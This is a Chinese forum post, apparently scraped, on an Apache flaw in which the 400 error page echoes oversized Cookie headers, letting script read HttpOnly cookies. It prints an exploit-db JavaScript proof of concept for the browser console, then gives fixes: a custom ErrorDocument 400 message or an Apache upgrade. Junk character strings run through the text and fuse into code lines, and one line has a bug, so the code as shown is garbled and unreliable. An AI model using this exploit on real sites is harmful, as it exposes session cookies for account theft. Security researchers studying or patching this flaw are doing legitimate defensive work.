很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。, Q1 v, c5 I) |% @
$ ?1 G: L! Q. l
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:, f" h- e+ e0 T0 i
* `# S0 }& a2 `. g2 q
( f1 v( w) j% o: ?// http://www.exploit-db.com/exploits/18442/" s: k, V% N0 ?! A; J, ?; Q
function setCookies (good) {; f; S2 x' K! s% k
// Construct string for cookie value: r- C z9 w% E# U& v0 N
var str = "";
/ O1 I8 i% b& B1 d; j2 d( Mfor (var i=0; i< 819; i++) {8 o/ k. f! E$ Y, X2 k+ p
str += "x";2 c* n7 o$ G% G7 a. h C5 }# s# Z) T
}- c& Z0 y R1 c' W2 Z6 o2 [# k
// Set cookies' b1 ~% D {0 O7 u+ H
for (i = 0; i < 10; i++) {
7 k' n q% ~( }2 x5 Z$ s6 L9 r) I// Expire evil cookie+ z- T9 J- `8 g# V* \; }
if (good) { o4 @+ N3 T) c/ V5 t1 R$ D: e
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
, S: I& }, @4 l9 }! k) z}2 G* U. w7 K: W+ U
// Set evil cookie
, P9 }/ M, X# L3 N* ]$ Welse {$ J. |5 M1 T1 _7 o: c7 i+ G
var cookie = "xss"+i+"="+str+";path=/";% o( ?) M/ H& M) k' V/ Z( H1 H
}
4 K Q; `8 v; c/ ^document.cookie = cookie;
8 X, u* r8 j+ \. K* X: x# j; V}7 z# l- J1 [- W. n- \ R) V( h$ v* F2 Q
}. G4 V p: \8 c4 B5 x8 M
function makeRequest() {
* u' b; R2 C. V- A8 w- B3 _setCookies();
9 X) ?+ {& P4 m2 q4 P1 yfunction parseCookies () {
! ?! X& b9 ~7 {, |0 nvar cookie_dict = {};
F# j) @+ L z+ D// Only react on 400 status7 ?" u! M2 z: E: d) [7 n
if (xhr.readyState === 4 && xhr.status === 400) {
4 l, {$ A7 X: N1 s. `// Replace newlines and match <pre> content! q8 y5 J1 y4 d6 L; Y
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);4 K: j2 @. f6 y6 k* r
if (content.length) {
4 M3 J8 ?, V" z4 _7 ]// Remove Cookie: prefix
- }6 E3 v' \- ~1 Q7 i/ v% y e# dcontent = content[1].replace("Cookie: ", "");
! o! ]" h' R' h! S& yvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
f- c# P0 j/ @2 x// Add cookies to object( ~; [6 L3 j m4 U# D0 D
for (var i=0; i<cookies.length; i++) {
3 q( y1 F; C# J3 C7 ^- ?- O$ _* Lvar s_c = cookies.split('=',2);
, f3 ?+ h+ T2 ~; f* ~cookie_dict[s_c[0]] = s_c[1];% L/ H; {' a8 G/ A7 `% @
}" u- W( w6 Z; s _) t
}7 ?# h1 a; ], _$ i; v) h
// Unset malicious cookies
5 {6 i+ q9 A! M) U! r [: q' m3 DsetCookies(true);
% S3 l& y0 f% m6 G- nalert(JSON.stringify(cookie_dict));' ~7 ]2 \9 M( }# Z. k' y
}2 \; j0 ^+ v* v, o G
}
* Q8 w4 J/ o, w// Make XHR request$ a6 I8 g2 l" H D; I$ k
var xhr = new XMLHttpRequest();1 p5 D! q# T: S# A
xhr.onreadystatechange = parseCookies;
4 Y( X- p# I8 v7 | ^( D* l |xhr.open("GET", "/", true);; x: M6 K8 @/ u) M7 {
xhr.send(null);
0 X$ M* P! k4 d+ b" m" M}; B h6 ]8 c. E F* p- k
makeRequest();# R+ u0 w* a- T& X7 Y, L( t4 F
8 O6 g+ p% `/ I, O; r
你就能看见华丽丽的400错误包含着cookie信息。
7 W% @/ j6 ~5 J w8 ?9 Z
! ?2 R3 a1 Q: X: N4 @下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#+ T- [1 L! }; R' @. I
; \! F* P; C* d0 c
修复方案:$ Q- G6 T# v/ B& ?. T/ Y0 |: p$ y
# P ~( a' ]' s* y; J6 R" xApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
+ d$ r, W( x6 a- B1 ~3 t7 |. I( z; R( C6 E
In the event of a problem or error, Apachecan be configured to do one of four things,
$ M( G6 w1 Q& V4 P; d9 {$ |9 ] K) ^4 i; r, \
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
: x3 ?) j9 u' ], P: C2. output acustomized message输出一段信息
, a G. B& k0 T9 W3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
6 K$ w) s( S. s& ]: h4. redirect to an external URL to handle theproblem/error转向一个外部URL
) b8 ]2 U4 R7 h, W$ V" |7 l! H4 D8 L
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
1 {" A0 H$ l* T3 l- _; E+ R
! l9 h$ |5 _( }6 f3 b, |Apache配置:
+ R" Z" j2 N2 m0 ^& p9 A- o
) b/ e( z j! \* FErrorDocument400 " security test"
2 t# I$ g8 a# n G2 N3 O
4 q' C4 U5 B6 a4 @" l当然,升级apache到最新也可:)。
$ \6 o$ y% g) h" ^( J$ I& ]
) a6 F+ o$ C) x6 U( z参考:http://httpd.apache.org/security/vulnerabilities_22.html) S" m& Z' x1 ]8 v$ x- D
- G. Y/ k" z0 X, A- V |